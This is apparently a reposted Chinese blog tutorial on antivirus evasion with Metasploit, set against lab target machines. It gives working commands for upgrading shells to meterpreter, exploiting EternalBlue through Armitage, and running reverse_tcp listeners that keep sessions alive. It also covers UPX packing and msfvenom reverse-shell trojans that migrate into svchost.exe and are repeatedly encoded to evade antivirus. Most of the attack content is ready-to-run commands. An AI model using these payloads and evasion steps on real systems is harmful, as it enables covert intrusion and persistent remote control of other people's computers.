网络安全基础免杀

这篇具有很好参考价值的文章主要介绍了网络安全基础免杀。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

  • 1. 会话提升的几种方式
  • 2. armitage的熟悉
  • 3. handler生成监听器的方法
  • 4. 防止会话假死
  • 5. 控制台设置编码
  • 6. upx加壳
  • 7. msfvenom木马payload持久化
  • 8. msfvenom木马编码

正文

免杀1

1. 会话提升的几种方式

python -c "import pty;pty.spawn('/bin/bash');" 会话提升

网络安全基础免杀

session -u 4      将shell会话提升成meterpreter会话

网络安全基础免杀

网络安全基础免杀

直接修改payload,原来的设置的payload为shell的木马也能连上

网络安全基础免杀
网络安全基础免杀

2. armitage的熟悉

apt-get install armitage       安装

网络安全基础免杀

armitage   进入界面

网络安全基础免杀

不用改直接进入

网络安全基础免杀

选择快速查询

网络安全基础免杀

输入要查询的地址

网络安全基础免杀

nmap出来存活的主机有(1是物理电脑,2是网关,135是linux靶机,254是广播地址,128是win7靶机,129是本机)

网络安全基础免杀

网络安全基础免杀

拒绝访问打开服务管理器

网络安全基础免杀

用所有的漏洞进行探测

网络安全基础免杀

搜索ms17

网络安全基础免杀

移过去

网络安全基础免杀

存在永恒之蓝的漏洞

网络安全基础免杀

进行渗透

网络安全基础免杀

渗透成功

网络安全基础免杀
网络安全基础免杀

这里可以设置监听器

网络安全基础免杀

3. handler生成监听器的方法

网络安全基础免杀

handler -H 192.168.1.129 -P 4444 -p windows/meterpreter/reverse_tcp

4. 防止会话假死

show advanced 显示高级参数设置

网络安全基础免杀

set ExitOnSession false 监听到shell之后端口继续监听

网络安全基础免杀
网络安全基础免杀
网络安全基础免杀

set SessionCommunicationTimeout 0 设置会话存活时间,默认5分钟

网络安全基础免杀
网络安全基础免杀

set SessionExpirationTimeout 0 设置会话存活时间,默认一星期

网络安全基础免杀

网络安全基础免杀

网络安全基础免杀

回到顶部

5. 控制台设置编码

EnableStageEncoding 是否允许stage进行编码

网络安全基础免杀
网络安全基础免杀

StageEncoder 设置要用的编码

优秀的编码:x86/shikata_ga_nai、cmd/powershell_base64

网络安全基础免杀
网络安全基础免杀

回到顶部

6. upx加壳

加壳

网络安全基础免杀

upx -9 qq.exe

-1压缩更快 -9压缩更好

-d解压 -l列表压缩文件

-t测试压缩文件 -V显示版本号

-h给予更多帮助 -L显示软件许可证

测试压缩文件能否运行

网络安全基础免杀

upx -t qq.com            OK表示可以运行

回到顶部

7. msfvenom木马payload持久化

(会在运行木马的时候自动迁移到svchost.exe的对应进程中去)

网络安全基础免杀

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.129 lport=4444 PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o shell.exe

回到顶部

8. msfvenom木马编码

网络安全基础免杀

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.227.129 lport=4444 -e cmd/powershell_base64 -i 14 -f exe -o shell.exe

网络安全基础免杀

 文章来源地址https://www.toymoban.com/news/detail-465220.html

到了这里,关于网络安全基础免杀的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 区块链技术,如何提升网络安全?

    眼下,区块链已经成为科技界的热门技术,甚至被称为颠覆性技术。那么,在网络安全领域,区块链能否发挥作用呢?答案是肯定的。 ——编者 当著名咨询公司Gartner在预测2018年对大部分企业公司影响显著的十大战略技术时,区块链技术位列其中。而最近普华永道国际会计事

    2024年02月05日
    浏览(57)
  • 提升网络安全重要要素IP地址

    在数字化时代,网络安全已经成为人们关注的焦点。本文将深入探讨网络安全与IP地址之间的紧密联系,以及IP地址在构建数字世界的前沿堡垒中的关键作用。 网络安全是当今数字社会中不可忽视的挑战之一。而IP地址,作为互联网通信的基础协议,既是数字化时代的桥梁,也

    2024年02月03日
    浏览(47)
  • 提升网络安全防御能力的几个方面

    提升网络安全防御能力对于个人和组织来说都至关重要。网络安全是一个全面的概念,包括保护个人信息、防止恶意攻击和确保网络资源的安全。在这篇文章中,我将介绍几个方面来提高网络安全防御能力其中包括IP地址查询。 首先, IP地址查询 是一种网络安全工具可以帮助

    2024年02月09日
    浏览(46)
  • 通过IP地址管理提升企业网络安全防御

    在今天的数字时代,企业面临着越来越多的网络安全威胁。这些威胁可能来自各种来源,包括恶意软件、网络攻击和数据泄露。为了提高网络安全防御,企业需要采取一系列措施,其中IP地址管理是一个重要的方面 1. IP地址的基础知识 首先,让我们了解一下IP地址的基础知识

    2024年02月07日
    浏览(44)
  • 网络安全攻击方式有几种?常见类型介绍!

    渗透测试是为了证明网络防御按照预期计划正常运行而提供的一种机制。作为网络安全防范的一种新技术,渗透测试对于网络安全组织具有实际应用价值,那么你知道渗透测试的攻击方法有哪些吗?以下为大家详细介绍一下,希望对你们有所帮助。 目前国内外使用比较普遍的

    2024年02月11日
    浏览(41)
  • 前端常问的几种网络安全攻击类型

    就是攻击者想尽一切办法将可以执行的代码注入到网页中。 存储型(server端): 场景:见于带有用户保存数据的网站功能,如论坛发帖、商品评论、用户私信等。 攻击步骤: i)攻击者将恶意代码提交到目标网站的数据库中 ii)用户打开目标网站时,服务端将恶意代码从数

    2024年02月06日
    浏览(45)
  • 如何利用在线网络靶场将安全提升至新水平

    在 Standoff 365 的在线网络靶场中,任何公司都可以试验信息安全手段和企业网络设置,优化攻击检测、响应和事件调查的技能。 2023 年,我们不仅准许攻击者使用,也准许防御者使用。我们可以根据客户要求轻松部署 10 个细分行业中的任一行业,或帮助公司重建他们自己

    2024年01月20日
    浏览(53)
  • SK5代理:提升网络安全和性能的先进技术

    在当今互联网时代,保护用户隐私和提升网络性能是网络工程师面临的重要挑战。SK5代理作为一种高级代理服务器技术,被广泛应用于网络安全和性能优化领域。 SK5代理的技术原理 网络流量重定向:SK5代理通过重定向网络流量实现对数据包的处理和分发。 安全隧道加密:

    2024年02月12日
    浏览(48)
  • 网络安全从业人员应该如何提升自身的web渗透能力?

    前言 web 渗透这个东西学起来如果没有头绪和路线的话,是非常烧脑的。 理清 web 渗透学习思路,把自己的学习方案和需要学习的点全部整理,你会发现突然渗透思路就有点眉目了。 程序员之间流行一个词,叫 35 岁危机,,意思就是说 35 岁是个坎,容易被淘汰。 那么安全行

    2023年04月09日
    浏览(105)
  • 如何利用Socks5代理IP提升网络安全与跨境电商业务

    在今天的数字时代,网络安全对于个人和企业来说都至关重要。随着跨境电商和在线游戏等业务的不断发展,保护网络安全变得尤为重要。Socks5代理IP是一项强大的工具,可以帮助您实现更高水平的网络安全,同时促进跨境电商和游戏领域的增长。本文将探讨Socks5代理IP的作用

    2024年02月09日
    浏览(60)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包